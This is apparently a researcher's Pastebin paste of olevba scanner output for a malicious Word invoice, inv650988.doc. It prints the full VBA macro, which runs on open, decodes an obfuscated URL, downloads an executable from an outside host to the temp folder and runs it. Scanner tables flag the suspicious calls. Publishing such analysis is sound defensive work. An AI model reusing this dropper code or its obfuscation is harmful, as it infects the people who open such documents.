dynamoo

Malicious Word macro

Feb 27th, 2015
519
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Flags       Filename                                                        
  2. ----------- -----------------------------------------------------------------
  3. OLE:MAS---- inv650988.doc
  4.  
  5. (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  6.  
  7. ===============================================================================
  8. FILE: inv650988.doc
  9. Type: OLE
  10. -------------------------------------------------------------------------------
  11. VBA MACRO ThisDocument.cls
  12. in file: inv650988.doc - OLE stream: u'Macros/VBA/ThisDocument'
  13. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  14. Sub autoopen()
  15. qK3M8Yvc
  16. End Sub
  17.  
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Class1.cls
  27. in file: inv650988.doc - OLE stream: u'Macros/VBA/Class1'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. (empty macro)
  30. -------------------------------------------------------------------------------
  31. VBA MACRO fdgfdgfdg.bas
  32. in file: inv650988.doc - OLE stream: u'Macros/VBA/fdgfdgfdg'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. #If VBA7 Then
  35.     Private Declare PtrSafe Function dfsdfsdffg Lib "urlmon" Alias _
  36.     "URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
  37.     ByVal gfhgfhF As String, _
  38.     ByVal hjkhgFF As String, _
  39.     ByVal gfhfghF As Long, _
  40.     ByVal gfdgdf As LongPtr) As LongPtr
  41. #Else
  42.     Private Declare Function dfsdfsdffg Lib "urlmon" Alias _
  43.     "URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
  44.     ByVal gfhgfhF As String, _
  45.     ByVal hjkhgFF As String, _
  46.     ByVal gfhfghF As Long, _
  47.     ByVal gfdgdf As Long) As Long
  48. #End If
  49.  
  50. Sub qK3M8Yvc()
  51. ZIoX79I wUnMnysKtQAKQMZpELN("hytit5pm:D/@/‚hle/w€.oh%o9m|e|pcacg4eD.\t.-To,nZl}i0n}ex.md,e&/Rj3sG/SbKibn‚.„eIxLe^"), Environ(wUnMnysKtQAKQMZpELN("T^M‚P|")) & wUnMnysKtQAKQMZpELN("\D3$294D2=3S5t2v3;5>.Pe~xYe.")
  52. End Sub
  53. Function ZIoX79I(D8PeV0 As String, j4B1GyX As String) As Boolean
  54. vJHKBJdfkgfg = dfsdfsdffg(0&, D8PeV0, j4B1GyX, 0&, 0&)
  55. uiLb = Shell(j4B1GyX, 1)
  56. End Function
  57.  
  58.  
  59.  
  60.  
  61. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  62. ANALYSIS:
  63. +------------+--------------------+-----------------------------------------+
  64. | Type       | Keyword            | Description                             |
  65. +------------+--------------------+-----------------------------------------+
  66. | Suspicious | Lib                | May run code from a DLL                 |
  67. | Suspicious | Shell              | May run an executable file or a system  |
  68. |            |                    | command                                 |
  69. | Suspicious | Environ            | May read system environment variables   |
  70. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  71. +------------+--------------------+-----------------------------------------+
  72. -------------------------------------------------------------------------------
  73. VBA MACRO Module2.bas
  74. in file: inv650988.doc - OLE stream: u'Macros/VBA/Module2'
  75. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  76.  
  77. Public Function wUnMnysKtQAKQMZpELN(biBIyeZaYdOH As String) As String
  78. GoTo kuddPCezMbIaLPpebUn
  79. kuddPCezMbIaLPpebUn:
  80. For tTFUZcTsUAkgUp = 1 To Len(biBIyeZaYdOH) Step 2
  81. GoTo BHDOSh
  82. BHDOSh:
  83. GoTo NYRvLeyRLBhqqp
  84. NYRvLeyRLBhqqp:
  85. GoTo YfJVVl
  86. YfJVVl:
  87. GoTo kIYQAilFim
  88. kIYQAilFim:
  89. GoTo gtgSuQOrZqcgFgrl
  90. gtgSuQOrZqcgFgrl:
  91. wUnMnysKtQAKQMZpELN = wUnMnysKtQAKQMZpELN & Mid(biBIyeZaYdOH, tTFUZcTsUAkgUp, 1)
  92. GoTo tRJGRjxSGPojLNuOTcRx
  93. tRJGRjxSGPojLNuOTcRx:
  94. GoTo FKhovanmCFIAZoh
  95. FKhovanmCFIAZoh:
  96. GoTo BVyDQNwJjjKS
  97. BVyDQNwJjjKS:
  98. GoTo bGfwQwHBTDaJUbQ
  99. bGfwQwHBTDaJUbQ:
  100. Next
  101. GoTo VQhEzdeKRksiNIJHM
  102. VQhEzdeKRksiNIJHM:
  103. GoTo LcDCSILCcEkhPD
  104. LcDCSILCcEkhPD:
  105. GoTo FTeMMzzbjwYrQvMZN
  106. FTeMMzzbjwYrQvMZN:
  107. GoTo QTqalrnyPQmnxU
  108. QTqalrnyPQmnxU:
  109. End Function
  110.  
  111. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  112. ANALYSIS:
  113. No suspicious keyword or IOC found.
RAW Paste Data